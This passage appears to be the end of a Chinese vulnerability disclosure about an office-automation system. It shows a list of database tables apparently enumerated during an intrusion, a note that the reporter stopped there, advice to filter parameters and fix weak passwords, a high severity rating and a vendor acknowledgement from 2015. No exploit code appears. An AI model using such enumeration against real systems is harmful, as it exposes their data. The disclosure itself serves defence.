mekp_ProjectWarningSend || mekp_QAAnswer || mekp_QAFolderPermissions || mekp_QAFolderPermissions || mekp_QAFolderWF || mekp_QAParameters || mekp_QAQuestion || mekp_ReadingRecord || mekp_ScheduleAllowList || mekp_ScheduleAllowList || mekp_ScheduleFolder || mekp_ScheduleGroup || mekp_ScheduleGroupShare || mekp_ScheduleGroupUser || mekp_ScheduleMessage || mekp_ShortCutDetail || mekp_ShortCutDetail || mekp_Suggest || mekp_System || mekp_TagFolder || mekp_Tag_User || mekp_Tag_User || mekp_Temp || mekp_module_flow_Ins || mekp_module_flow_define || mekp_module_flow_define || mekp_operation_log || mekp_v_AttriMould || mekp_v_AttriMouldSel || mekp_v_AttriSelDefine || mekp_v_AttriSelUse || mekp_v_AttriUse || mekp_v_Attributes || mekp_v_ProjectDateRule || mekp_v_ProjectDoc || mekp_v_ProjectRoleGroupInfo || mekp_v_ProjectTaskSummary || mekp_v_QuestionAndFolder || mekp_v_SearchInfo || mekp_v_TagAndFolder || mekp_v_TagAndFolderUser || mekp_v_TemplateInfo || mekp_wechartmenu || oa_task_day_reply || oa_task_day_reply || oa_task_month_reply || oa_task_week_reply || oa_vod_server || task_summary_config || task_summary_remind || temp_oa_doc_file || v_MOBILE_RowCount || v_fi_message_info_admin || v_fi_message_rec_list || v_fi_org_dept_emp || v_fi_org_dept_emp || v_fi_sys_alert || v_fi_sys_parameter || v_oa_project_item || v_oa_report_formsentence || v_oa_vod_server |+------------------------------------+
不深入了
过滤参数弱口令
危害等级:高
漏洞Rank:20
确认时间:2015-10-19 09:24
收到,我们会尽快处理,多谢!
暂无